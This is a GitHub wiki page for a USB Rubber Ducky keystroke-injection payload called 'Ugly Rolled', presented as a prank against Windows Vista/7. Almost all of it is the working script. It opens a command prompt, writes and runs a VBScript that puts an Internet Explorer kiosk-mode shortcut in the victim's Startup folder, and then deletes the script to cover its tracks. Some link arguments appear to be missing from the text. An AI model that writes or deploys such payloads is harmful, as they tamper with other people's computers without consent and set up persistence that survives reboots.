Payload Ugly Rolled Prank - a3rd/USB-Rubber-Ducky GitHub Wiki
Author: petertfm Duckencoder: 1.2 Target: Windows vista/7 Description: User start-up prank, Please see REM in the script.
REM YouveBeenUglyRolled By petertfm REM payload creats a vbs script that is run to make a YouveBeenUglyRolled.lnk to IE in the users start-up folder REM IE is set to run in kiosk mode "-K" and links to youtube with a very annoying lady gaga with jim carrey's face video REM note if running in 64 bit windows, you may need to change %programfiles% with %programfiles(x86)% flash player 64 bit may not be installed! ESCAPE GUI r DELAY 120 STRING cmd.exe ENTER DELAY 325 STRING copy con YouveBeenUglyRolled.vbs ENTER STRING Set WshShell = WScript.CreateObject("WScript.Shell"): STRING StrMyStartUp = WshShell.SpecialFolders("Startup"): STRING Set lnk = WshShell.CreateShortcut(StrMyStartUp + "\YouveBeenUglyRolled.lnk"): ENTER STRING lnk.TargetPath = "%programfiles%\Internet Explorer\iexplore.exe": REM place any link here, this one is a very annoying lady gaga with jim carrey's face REM the -K option makes IE run in kiosk mode STRING lnk.Arguments = "-K": REM also try for katy perry rip, or REM for scary car video STRING lnk.Save ENTER CTRL z ENTER STRING YouveBeenUglyRolled.vbs ENTER DELAY 200 STRING DEL YouveBeenUglyRolled.vbs ENTER STRING EXIT ENTER